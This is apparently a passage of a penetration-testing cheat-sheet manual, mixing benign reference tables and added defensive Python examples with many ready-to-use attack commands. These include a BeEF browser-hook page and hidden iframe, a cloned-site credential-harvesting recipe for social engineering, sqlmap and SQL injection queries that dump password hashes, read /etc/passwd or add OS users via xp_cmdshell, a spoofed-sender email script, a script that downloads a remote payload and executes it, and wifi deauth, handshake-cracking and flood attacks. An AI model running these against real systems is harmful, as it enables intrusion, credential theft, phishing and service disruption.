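HASHLIB_NAME = {"MD5": "md5", "SHA-1": "sha1", "SHA-256": "sha256", "SHA-512": "sha512"}


def candidate_algorithms(hexdigest):
    """Algorithms whose digest size equals the hex string's byte length; [] if not clean hex."""
    h = hexdigest.strip().lower()
    if not re.fullmatch(r"[0-9a-f]+", h) or len(h) % 2:
        return []
    nbytes = len(h) // 2
    return [name for name, size in DIGEST_BYTES.items() if size == nbytes]


def hash_bytes(data, algorithm):
    """Hex digest of an in-memory byte string under one of the table's algorithms."""
    return hashlib.new(HASHLIB_NAME[algorithm], data).hexdigest()


def hash_file(path, algorithm, chunk_size=65536):
    """Stream the file through the digest so large samples are not read into memory at once."""
    h = hashlib.new(HASHLIB_NAME[algorithm])
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()


def hash_file_all(path):
    """All four digests for one file, keyed by the table's names."""
    return {name: hash_file(path, name) for name in DIGEST_BYTES}


def verify_table():
    """Check each algorithm's hex digest decodes to the byte length the table lists."""
    sample = b"constructed sample content"   # constructed input
    return all(len(hash_bytes(sample, n)) == 2 * size for n, size in DIGEST_BYTES.items())


def demo_file():
    """Write a constructed temp file, return its digests and remove the file again."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "wb") as f:
        f.write(b"abc")   # SHA-1("abc") is the 40-hex value used in the John section above
    try:
        return hash_file_all(path)
    finally:
        os.remove(path)


if __name__ == "__main__":
    for name, digest in demo_file().items():
        print("%-8s %s  -> candidates by length: %s" % (name, digest, candidate_algorithms(digest)))
```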

COMMON USER-AGENT STRINGS
IE 6.0/WinXP 32-bit
  Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
IE 7.0/WinXP 32-bit
  Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
IE 8.0/WinVista 32-bit
  Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1); .NET CLR 3.5.30729)
IE 9.0/Win7 32-bit
  Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
IE 9.0/Win7 64-bit
  Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Firefox 5.0/Win7 64-bit
  Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0
Firefox 13.0/WinXP 32-bit
  Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Firefox 17.0/Win7 64-bit
  Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0
Firefox 17.0/Linux
  Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0
Firefox 17.0/MacOSX 10.7
  Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:17.0) Gecko/20100101 Firefox/17.0
Firefox 17.0/MacOSX 10.8
  Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:17.0) Gecko/20100101 Firefox/17.0
Chrome Generic/WinXP
  Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11
Chrome Generic/Win7
  Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11
Chrome Generic/Linux
  Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11
Chrome Generic/MacOSX
  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11
Chrome 13.0/Win7 64-bit
  Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Safari 6.0/MacOSX
  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17
Mobile Safari 6.0/iOS (iPad)
  Mozilla/5.0 (iPad; CPU OS 6_0_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A523 Safari/8536.25
Mobile Safari 6.0/iOS (iPhone)
  Mozilla/5.0 (iPhone; CPU iPhone OS 6_0_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A523 Safari/8536.25
Mobile Safari 4.0/Android
  Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
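Classifying User-Agent strings of the kind listed above and tallying them over web-server log lines, as an added example (not part of the original manual): on the defensive side the table is used to spot unexpected browsers or tooling in access logs. The log lines in SAMPLE_LOG are constructed for the example.

```python
import re

# Browser families in the table; order matters, see the comments.
BROWSER_PATTERNS = [
    ("IE", re.compile(r"MSIE (\d+\.\d+)")),          # first: the IE 8 string nests an "MSIE 6.0" token
    ("Chrome", re.compile(r"Chrome/(\d+\.\d+)")),    # before Safari: Chrome strings also carry "Safari/"
    ("Firefox", re.compile(r"Firefox/(\d+\.\d+)")),
    ("Safari", re.compile(r"Version/(\d+\.\d+).*Safari/")),
]
WINDOWS_NT = {"5.1": "WinXP", "6.0": "WinVista", "6.1": "Win7"}
LOG_UA = re.compile(r'"([^"]*)"\s*$')                # last quoted field of a combined-format log line


def parse_user_agent(ua):
    """Return browser, version, OS and (for Windows) architecture as a dict."""
    browser, version = "Unknown", ""
    for name, pattern in BROWSER_PATTERNS:
        m = pattern.search(ua)
        if m:
            browser, version = name, m.group(1)
            break
    if browser == "Safari" and "Mobile" in ua:
        browser = "Mobile Safari"

    os_name, arch = "Unknown", ""
    m = re.search(r"Windows NT (\d+\.\d+)", ua)
    if m:
        os_name = WINDOWS_NT.get(m.group(1), "Windows NT " + m.group(1))
        arch = "64-bit" if ("WOW64" in ua or "Win64" in ua) else "32-bit"
    elif "Android" in ua:          # before the Linux check: Android strings also say "Linux"
        os_name = "Android"
    elif "iPad" in ua:
        os_name = "iOS (iPad)"
    elif "iPhone" in ua:
        os_name = "iOS (iPhone)"
    else:
        m = re.search(r"Mac OS X (\d+)[._](\d+)", ua)
        if m:
            os_name = "MacOSX %s.%s" % (m.group(1), m.group(2))
        elif "Linux" in ua or "X11" in ua:
            os_name = "Linux"
    return {"browser": browser, "version": version, "os": os_name, "arch": arch}


def describe(ua):
    """Label in the table's style, e.g. 'IE 9.0/Win7 64-bit'."""
    p = parse_user_agent(ua)
    label = "%s %s/%s" % (p["browser"], p["version"], p["os"])
    return label + (" " + p["arch"] if p["arch"] else "")


def summarize_log(lines):
    """Tally labels over access-log lines; lines with no agent ("-") count as 'Unknown'."""
    counts = {}
    for line in lines:
        m = LOG_UA.search(line)
        label = describe(m.group(1)) if m and m.group(1) != "-" else "Unknown"
        counts[label] = counts.get(label, 0) + 1
    return counts


SAMPLE_LOG = [   # constructed combined-format lines
    '10.0.0.5 - - [10/Mar/2014:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"',
    '10.0.0.6 - - [10/Mar/2014:12:00:02 +0000] "GET /login HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) '
    'AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"',
    '10.0.0.7 - - [10/Mar/2014:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"',
    '10.0.0.8 - - [10/Mar/2014:12:00:04 +0000] "GET /robots.txt HTTP/1.1" 200 64 "-" "-"',
]

if __name__ == "__main__":
    for label, n in sorted(summarize_log(SAMPLE_LOG).items()):
        print("%4d  %s" % (n, label))
```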

HTML

BEEF HOOK WITH EMBEDDED FRAME
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">
<html>
<head>
<title>Campaign Title</title>
<script>
var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + ':8080/hook.js" type="text/javascript"><\/script>';
document.write(commandModuleStr);
//Site refresh=window.setTimeout(function() {window.location.href='http://www.google.com/'},20000);
</script>
</head>
<frameset rows="*,1px">
<frame src="http://www.google.com/" frameborder=0 noresize="noresize" />
<frame src="/e" frameborder=0 scrolling=no noresize=noresize />
</frameset>
</html>

EMBEDDED JAVA APPLET (* PLACE WITHIN <body> TAG)
<applet archive="legit.jar" code="This is a legit applet" width="1" height="1"></applet>

EMBEDDED IFRAME
<iframe src="http://1.1.1.1" width="0" height="0" frameborder="0" tabindex="-1" title="empty" style="visibility:hidden;display:none"></iframe>

FIREFOX TYPE CONVERSIONS
ASCII  -> Base64   javascript:btoa("ascii str")
Base64 -> ASCII    javascript:atob("base64==")
ASCII  -> URI      javascript:encodeURI("<script>")
URI    -> ASCII    javascript:decodeURI("%3cscript%3E")

WGET
CAPTURE SESSION TOKEN
wget -q --save-cookies=cookie.txt --keep-session-cookies --post-data="username=admin&password=pass&Login=Login" http://<url>/login.php

CURL
GRAB HEADERS AND SPOOF USER AGENT
curl -I -X HEAD -A "Mozilla/5.0 (compatible; MSIE 7.01; Windows NT 5.0)" http://<ip>

SCRAPE SITE AFTER LOGIN
curl -u user:pass -o outfile https://login.bob.com

FTP
curl ftp://user:pass@bob.com/directory/

SEQUENTIAL LOOKUP
curl http://bob.com/file[1-10].txt

BASIC AUTHENTICATION USING APACHE2
The steps below will clone a website and redirect after 3 seconds to another page requiring basic authentication. It has proven very useful for collecting credentials during social engineering engagements.
1. Start Social Engineering Toolkit (SET)
   /pentest/exploits/set/./set
2. Through SET, use the 'Website Attack Vector' menu to clone your preferred website. 'Do not close SET'
3. In a new terminal create a new directory (lowercase L)
   mkdir /var/www/l
4. Browse to SET directory and copy the cloned site
   cd /pentest/exploits/set/src/web_clone/site/template/
   cp index.html /var/www/index.html
   cp index.html /var/www/l/index.html
5. Open /var/www/index.html and add tag between head tags
   <meta http-equiv="refresh" content="3;url=http://<domain/ip>/l/index.html"/>
6. Create blank password file to be used for basic auth
   touch /etc/apache2/.htpasswd
7. Open /etc/apache2/sites-available/default and add:
   <Directory /var/www/l>
     AuthType Basic
     AuthName "PORTAL LOGIN BANNER"
     AuthUserFile /etc/apache2/.htpasswd
     Require user test
   </Directory>
8. Start Apache2
   /etc/init.d/apache2 start
9. Start Wireshark and add the filter:
   http.authbasic
10. Send the following link to your target users
   http://<domain/ip>/index.html


AUTOMATED WEB PAGE SCREENSHOTS
NMAP WEB PAGE SCREENSHOTS [9]
Install dependencies:
wget http://wkhtmltopdf.googlecode.com/files/wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2
tar -jxvf wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2
cp wkhtmltoimage-i386 /usr/local/bin/
Install Nmap module:
git clone git://github.com/SpiderLabs/Nmap-Tools.git
cd Nmap-Tools/NSE/
cp http-screenshot.nse /usr/local/share/nmap/scripts/
nmap --script-updatedb
OS/version detection using screenshot script (screenshots saved as .png):
nmap -A --script=http-screenshot -p80,443 1.1.1.0/24 -oA nmapscreengrab
Script will generate HTML preview page with all screenshots:
#!/bin/bash
printf "<HTML><BODY><BR>" > preview.html
ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>" }' >> preview.html
printf "</BODY></HTML>" >> preview.html

PEEPINGTOM WEB PAGE SCREENSHOTS
Install Dependencies:
Download Phantomjs
https://phantomjs.googlecode.com/files/phantomjs-1.9.2-linux-x86_64.tar.bz2
Download PeepingTom
git clone https://bitbucket.org/LaNMaSteR53/peepingtom.git
Extract and copy phantomjs from phantomjs-1.9.2-linux-x86_64.tar.bz2 and copy to peepingtom directory
Run PeepingTom
python peepingtom.py http://<mytarget.com>


SQLMAP
GET REQUEST
./sqlmap.py -u "http://<url>?id=1&str=val"

POST REQUEST
./sqlmap.py -u "http://<url>" --data="id=1&str=val"

SQL INJECTION AGAINST SPECIFIC PARAMETER WITH DB TYPE SPECIFIED
./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" -b --dbms="mssql|mysql|oracle|postgres"

SQL INJECTION ON AUTHENTICATED SITE
1. Login and note cookie value (cookie1=val1, cookie2=val2)
./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" --cookie="cookie1=val1;cookie2=val2"

SQL INJECTION AND COLLECT DB VERSION, NAME, AND USER
./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" -b --current-db --current-user

SQL INJECTION AND GET TABLES OF DB=TESTDB
./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" --tables -D "testdb"

SQL INJECTION AND GET COLUMNS OF USER TABLE
./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" --columns -T "users"


MS-SQL
SELECT @@version                                            DB version
EXEC xp_msver                                               Detailed version info
EXEC master..xp_cmdshell 'net user'                         Run OS command
SELECT HOST_NAME()                                          Hostname & IP
SELECT DB_NAME()                                            Current DB
SELECT name FROM master..sysdatabases;                      List DBs
SELECT user_name()                                          Current user
SELECT name FROM master..syslogins                          List users
SELECT name FROM master..sysobjects WHERE xtype='U';        List tables
SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='mytable');   List columns

SYSTEM TABLE CONTAINING INFO ON ALL TABLES
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES

LIST ALL TABLES/COLUMNS
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name='mytable')

PASSWORD HASHES (2005)
SELECT name, password_hash FROM master.sys.sql_logins

POSTGRES
SELECT inet_server_addr()                  Hostname & IP
SELECT current_database();                 Current DB
SELECT datname FROM pg_database;           List DBs
SELECT user;                               Current user
SELECT username FROM pg_user;              List users
SELECT username,passwd FROM pg_shadow      List password hashes

LIST COLUMNS
SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public')

LIST TABLES
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r','') AND n.nspname NOT IN ('pg_catalog','pg_toast') AND pg_catalog.pg_table_is_visible(c.oid)

MYSQL
SELECT @@version;                               DB version
SELECT @@hostname;                              Hostname & IP
SELECT database();                              Current DB
SELECT distinct(db) FROM mysql.db;              List DBs
SELECT user();                                  Current user
SELECT user FROM mysql.user;                    List users
SELECT host,user,password FROM mysql.user;      List password hashes

LIST ALL TABLES & COLUMNS
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

EXECUTE OS COMMAND THROUGH MYSQL
osql -S <ip>,<port> -U sa -P <pwd> -Q "exec xp_cmdshell 'net user /add <user> <pass>'"

READ WORLD-READABLE FILES
UNION ALL SELECT LOAD_FILE('/etc/passwd');

WRITE TO FILE SYSTEM
SELECT * FROM mytable INTO dumpfile '/tmp/somefile';

ORACLE
SELECT * FROM v$version;                                 DB version
SELECT version FROM v$instance;                          D<br>B version
SELECT instance_name FROM v$instance;                    Current DB
SELECT name FROM v$database;                             Current DB
SELECT DISTINCT owner FROM all_tables;                   List DBs
SELECT user FROM dual;                                   Current user
SELECT username FROM all_users ORDER BY username;        List users
SELECT column_name FROM all_tab_columns;                 List columns
SELECT table_name FROM all_tables;                       List tables
SELECT name, password, astatus FROM sys.user$;           List password hashes

LIST DBAs
SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';


PYTHON
PYTHON PORT SCANNER
import socket as sk
for port in range(1, 1024):
    try:
        s = sk.socket(sk.AF_INET, sk.SOCK_STREAM)
        s.settimeout(1)   # seconds per connect attempt
        s.connect(('127.0.0.1', port))
        print('%d:OPEN' % port)
        s.close()
    except: continue

PYTHON BASE64 WORDLIST
#!/usr/bin/python
import base64

file1 = open("pwd.lst", "r")
file2 = open("b64pwds.lst", "w")
for line in file1:
    clear = "administrator:" + str.strip(line)
    new = base64.encodestring(clear)
    file2.write(new)
file1.close()
file2.close()

CONVERT WINDOWS REGISTRY HEX FORMAT TO READABLE ASCII
import binascii, sys, string
dataFormatHex = binascii.a2b_hex(sys.argv[1])
output = ""
for char in dataFormatHex:
    if char in string.printable: output += char
    else: output += '.'
print "\n" + output

READ ALL FILES IN FOLDER AND SEARCH FOR REGEX
import glob, re
for msg in glob.glob('/tmp/*.txt'):
    filer = open((msg), 'r')
    data = filer.read()
    message = re.findall(r'<message>(.*?)</message>', data, re.DOTALL)
    print "File %s contains %s" % (str(msg), message)
    filer.close()

SSL ENCRYPTED SIMPLEHTTPSERVER
Create SSL cert (follow prompts for customization)
openssl req -new -x509 -keyout cert.pem -out cert.pem -days 365 -nodes
Create httpserver.py
import BaseHTTPServer, SimpleHTTPServer, ssl
cert = "cert.pem"
httpd = BaseHTTPServer.HTTPServer(('192.168.1.10', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile=cert, server_side=True)
httpd.serve_forever()

PYTHON HTTP SERVER
python -m SimpleHTTPServer 8080

PYTHON EMAIL SENDER (* SENDMAIL MUST BE INSTALLED)
#!/usr/bin/python
import smtplib, string
import os, time
os.system("/etc/init.d/sendmail start")
time.sleep(4)

HOST = "localhost"
SUBJECT = "Email from spoofed sender"
TO = "target@you.com"
FROM = "spoof@spoof.com"
TEXT = "Message Body"
BODY = string.join((
    "From: %s" % FROM,
    "To: %s" % TO,
    "Subject: %s" % SUBJECT,
    TEXT
    ), "\r\n")
server = smtplib.SMTP(HOST)
server.sendmail(FROM, [TO], BODY)
server.quit()
time.sleep(4)
os.system("/etc/init.d/sendmail stop")

LOOP THROUGH IP LIST, DOWNLOAD FILE OVER HTTP AND EXECUTE
#!/usr/bin/python
import urllib2, os
urls = ["1.1.1.1", "2.2.2.2"]
port = "80"
payload = "cb.sh"
for url in urls:
    u = "http://%s:%s/%s" % (url, port, payload)
    try:
        r = urllib2.urlopen(u)
        wfile = open("/tmp/cb.sh", "wb")
        wfile.write(r.read())
        wfile.close()
        break
    except: continue
if os.path.exists("/tmp/cb.sh"):
    os.system("chmod 700 /tmp/cb.sh")
    os.system("/tmp/cb.sh")


PYTHON HTTP BANNER GRABBER (* TAKES AN IP RANGE, PORT, AND PACKET DELAY)
#!/usr/bin/python
import urllib2, sys, time
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-t", dest="iprange", help="target IP range, i.e. 192.168.1.1-25")
parser.add_option("-p", dest="port", default="80", help="port, default=80")
parser.add_option("-d", dest="delay", default=".5", help="delay (in seconds), default=.5 seconds")
(opts, args) = parser.parse_args()
if opts.iprange is None:
    parser.error("you must supply an IP range")
ips = []
headers = {}
octets = opts.iprange.split('.')
start = octets[3].split('-')[0]
stop = octets[3].split('-')[1]
for i in range(int(start), int(stop)+1):
    ips.append('%s.%s.%s.%d' % (octets[0], octets[1], octets[2], i))
print '\nScanning IPs: %s\n' % (ips)
for ip in ips:
    try:
        response = urllib2.urlopen('http://%s:%s' % (ip, opts.port))
        headers[ip] = dict(response.info())
    except Exception as e:
        headers[ip] = "Error: " + str(e)
    time.sleep(float(opts.delay))
for header in headers:
    try:
        print '%s : %s' % (header, headers[header].get('server'))
    except:
        print '%s : %s' % (header, headers[header])


SCAPY
* When you craft TCP packets with Scapy, the underlying OS will not recognize the initial SYN packet and will reply with a RST packet. To mitigate this you need to set the following iptables rule:
iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP

from scapy.all import *                    Imports all scapy libraries
ls()                                       List all available protocols
lsc()                                      List all scapy functions
conf                                       Show/set scapy config
IP(src=RandIP())                           Generate random src IPs
Ether(src=RandMAC())                       Generate random src MACs
ip=IP(src="1.1.1.1",dst="2.2.2.2")         Specify IP parameters
tcp=TCP(dport=443)                         Specify TCP parameters
data="TCP data"                            Specify data portion
packet=ip/tcp/data                         Create IP()/TCP() packet
packet.show()                              Display packet configuration
send(packet,count=1)                       Send 1 packet @ layer 3
sendp(packet,count=2)                      Send 2 packets @ layer 2
sendpfast(packet)                          Send faster using tcpreplay
sr(packet)                                 Send 1 packet & get replies
sr1(packet)                                Send only return 1st reply
for i in range(0,1000): send(packet)       Send packet 1000 times
sniff(count=100,iface="eth0")              Sniff 100 packets on eth0

SEND IPv6 ICMP MSG
sr(IPv6(src="<ipv6>", dst="<ipv6>")/ICMPv6EchoRequest())

UDP PACKET W/ SPECIFIC PAYLOAD:
ip=IP(src="<ip>", dst="<ip>")
u=UDP(dport=1234, sport=5678)
pay="my UDP packet"
packet=ip/u/pay
packet.show()
wrpcap("out.pcap",packet)                  write to pcap
send(packet)

NTP FUZZER
packet=IP(src="<ip>", dst="<ip>")/UDP(dport=123)/fuzz(NTP(version=4,mode=4))

SEND HTTP MESSAGE
from scapy.all import *
# Add iptables rule to block attack box from sending RSTs
# Create web.txt with entire GET/POST packet data
fileweb = open("web.txt",'r')
data = fileweb.read()
ip = IP(dst="<ip>")
SYN = ip/TCP(sport=RandNum(6000,7000),dport=80,flags="S",seq=4)
SYNACK = sr1(SYN)
ACK = ip/TCP(sport=SYNACK.dport,dport=80,flags="A",seq=SYNACK.ack,ack=SYNACK.seq+1)/data
reply,error = sr(ACK)
print reply.show()


PERL
PERL PORT SCANNER
use strict; use IO::Socket;
for(my $port=0; $port<=65535; $port++) {
    my $remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"127.0.0.1", PeerPort=>$port);
    if($remote) { print "$port is open\n"; }
}


REGEX EXPRESSIONS
^                         Start of string
*                         0 or more
+                         1 or more
?                         0 or 1
.                         Any char but \n
{3}                       Exactly 3
{3,}                      3 or more
{3,5}                     3 or 4 or 5
{3|5}                     3 or 5
[345]                     3 or 4 or 5
[^34]                     Not 3 or 4
[a-z]                     lowercase a-z
[A-Z]                     uppercase A-Z
[0-9]                     digit 0-9
\d                        Digit
\D                        Not digit
\w                        A-Z,a-z,0-9
\W                        Not A-Z,a-z,0-9
\s                        White Space (\t\r\n\f)
\S                        Not (\t\r\n\f)
reg[ex]                   "rege" or "regx"
regex?                    "rege" or "regex"
regex*                    "rege" w/ 0 or more x
regex+                    "rege" w/ 1 or more x
[Rr]egex                  "Regex" or "regex"
\d{3}                     Exactly 3 digits
\d{3,}                    3 or more digits
[aeiou]                   Any 1 vowel
(0[3-9]|1[0-9]|2[0-5])    Numbers 03-25
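The table's patterns run against constructed inputs, as an added example (not part of the original manual); it also shows the anchoring pitfall of the last row, where an unanchored search accepts "125" because the alternation matches inside it.

```python
import re

RANGE_03_25 = r"(0[3-9]|1[0-9]|2[0-5])"   # last row of the table


def matches_anywhere(text):
    """re.search accepts any string that merely contains a 03-25 value, so '125' passes."""
    return re.search(RANGE_03_25, text) is not None


def is_value_03_25(text):
    """Whole-string match (equivalent to ^...$): only a bare two-digit value 03-25 passes."""
    return re.fullmatch(RANGE_03_25, text) is not None


def find_values_03_25(text):
    """Word-bounded search: pulls 03-25 tokens out of free text without matching inside 125 or 0300."""
    return re.findall(r"\b" + RANGE_03_25 + r"\b", text)


def accepted(pattern, text):
    """True when the whole input is accepted by the pattern."""
    return re.fullmatch(pattern, text) is not None


def table_examples():
    """(pattern, input, accepted) for the table's example rows, judged as whole-string matches."""
    cases = [   # constructed inputs
        (r"reg[ex]", "rege"), (r"reg[ex]", "regx"), (r"reg[ex]", "regex"),
        (r"regex?", "rege"), (r"regex?", "regex"),
        (r"regex*", "regexxx"), (r"regex+", "rege"),
        (r"[Rr]egex", "Regex"), (r"[Rr]egex", "REGEX"),
        (r"\d{3}", "12"), (r"\d{3}", "123"), (r"\d{3,}", "1234"),
        (r"[aeiou]", "e"), (r"[^34]", "3"), (r"[^34]", "5"),
        (r".", "\n"),                  # '.' is any char but \n
        (r"\s", "\t"), (r"\S", " "),
    ]
    return [(p, s, accepted(p, s)) for p, s in cases]


if __name__ == "__main__":
    for p, s, ok in table_examples():
        print("%-10s %-10r %s" % (p, s, "match" if ok else "no match"))
    print(find_values_03_25("day 07 and 31 and 125 and 0300"))
```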


ASCII TABLE
x00 : NUL   x20 : SPC   x30 : 0   x40 : @   x50 : P   x60 : `   x70 : p
x08 : BS    x21 : !     x31 : 1   x41 : A   x51 : Q   x61 : a   x71 : q
x09 : TAB   x22 : "     x32 : 2   x42 : B   x52 : R   x62 : b   x72 : r
x0a : LF    x23 : #     x33 : 3   x43 : C   x53 : S   x63 : c   x73 : s
x0d : CR    x24 : $     x34 : 4   x44 : D   x54 : T   x64 : d   x74 : t
x1b : ESC   x25 : %     x35 : 5   x45 : E   x55 : U   x65 : e   x75 : u
            x26 : &     x36 : 6   x46 : F   x56 : V   x66 : f   x76 : v
            x27 : '     x37 : 7   x47 : G   x57 : W   x67 : g   x77 : w
            x28 : (     x38 : 8   x48 : H   x58 : X   x68 : h   x78 : x
            x29 : )     x39 : 9   x49 : I   x59 : Y   x69 : i   x79 : y
            x2a : *     x3a : :   x4a : J   x5a : Z   x6a : j   x7a : z
            x2b : +     x3b : ;   x4b : K   x5b : [   x6b : k
            x2c : ,     x3c : <   x4c : L   x5c : \   x6c : l
            x2d : -     x3d : =   x4d : M   x5d : ]   x6d : m
            x2e : .     x3e : >   x4e : N   x5e : ^   x6e : n
            x2f : /     x3f : ?   x4f : O   x5f : _   x6f : o


FREQUENCY CHART
120-150 kHz (LF)              RFID
13.56 MHz (HF)                RFID
433 MHz (UHF)                 RFID
315 MHz (N. Am)               Keyless Entry
433.92 MHz (Europe, Asia)     Keyless Entry
698-894 MHz                   Cellular (US)
1710-1755 MHz                 Cellular (US)
1850-1910 MHz                 Cellular (US)
2110-2155 MHz                 Cellular (US)
... MHz                       GPS
1-2 GHz                       L Band
868 MHz (Europe)              802.15.4 (ZigBee)
915 MHz (US, Australia)       802.15.4 (ZigBee)
2.4 GHz (worldwide)           802.15.4 (ZigBee)
2.4-2.4835 GHz                802.15.1 (Bluetooth)
2.4 GHz                       802.11b/g
5.0 GHz                       802.11a
2.4/5.0 GHz                   802.11n
4-8 GHz                       C Band
12-18 GHz                     Ku Band
18-26.5 GHz                   K Band
26.5-40 GHz                   Ka Band

FCC ID LOOKUP
https://apps.fcc.gov/oetcf/eas/reports/GenericSearch.cfm

FREQUENCY DATABASE
http://www.radioreference.com/apps/db/


KISMET REFERENCE [5]
e        List Kismet servers
h        Help
z        Toggle full-screen view
n        Name current network
m        Toggle muting of sound
i        View detailed information for network
t        Tag or untag selected network
s        Sort network list
g        Group tagged networks
l        Show wireless card power levels
u        Ungroup current group
d        Dump printable strings
c        Show clients in current network
r        Packet rate graph
L        Lock channel hopping to selected channel
a        View network statistics
H        Return to normal channel hopping
p        Dump packet type
+/-      Expand/collapse groups
f        Follow network center
CTRL+L   Re-draw the screen
w        Track alerts
Q        Quit Kismet
x        Close popup window

LINUX WIFI COMMANDS
rfkill list                     Identify wifi problems
rfkill unblock all              Turn on wifi
airodump-ng mon0                Monitor all interfaces

CONNECT TO UNSECURED WIFI
iwconfig ath0 essid $SSID
ifconfig ath0 up
dhclient ath0

CONNECT TO WEP WIFI NETWORK
iwconfig ath0 essid $SSID key <key>
ifconfig ath0 up
dhclient ath0

CONNECT TO WPA-PSK WIFI NETWORK
iwconfig ath0 essid $SSID
ifconfig ath0 up
wpa_supplicant -B -i ath0 -c wpa-psk.conf
dhclient ath0

CONNECT TO WPA-ENTERPRISE WIFI NETWORK
iwconfig ath0 essid $SSID
ifconfig ath0 up
wpa_supplicant -B -i ath0 -c wpa-ent.conf
dhclient ath0

LINUX BLUETOOTH
hciconfig hci0 up                                   Turn on bluetooth interface
hcitool -i hci0 scan --flush --all                  Scan for bluetooth devices
sdptool browse BD_ADDR                              List open services
hciconfig hci0 name "NAME" class 0x520204 piscan    Set as discoverable
pand -K                                             Clear pand sessions

LINUX WIFI TESTING
START MONITOR MODE INTERFACE
airmon-ng stop ath0
airmon-ng start wifi0
iwconfig ath0 channel $CH

CAPTURE CLIENT HANDSHAKE
airodump-ng -c $CH --bssid $AP -w file ath0      #Capture traffic
aireplay-ng -0 10 -a $AP -c $CH ath0             #Force client de-auth

BRUTE FORCE HANDSHAKE
aircrack-ng -w wordlist capture.cap              # WPA-PSK
asleap -r capture.cap -w dict.asleap             # LEAP
eapmd5pass -r capture.cap -w wordlist            # EAP-MD5

DOS ATTACKS
mdk3 int a -a $AP        #Auth Flood
mdk3 int b -c $CH        #Beacon Flood


REFERENCES
[1] mubix. Linux/Unix/BSD Post-Exploitation Command List. http://bit.ly/nuc0N0. Accessed on 17 Oct 2012.
[2] Tomes, Tim. Safely Dumping Hashes from Live Domain Controllers. http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html. Accessed on 14 Nov 2012.
[3] Reverse Shell Cheat Sheet. http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet. Accessed on 15 Nov 2012.
[4] Damele, Bernardo. Reverse Shell One-liners. http://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html. Accessed on 15 Nov 2012.
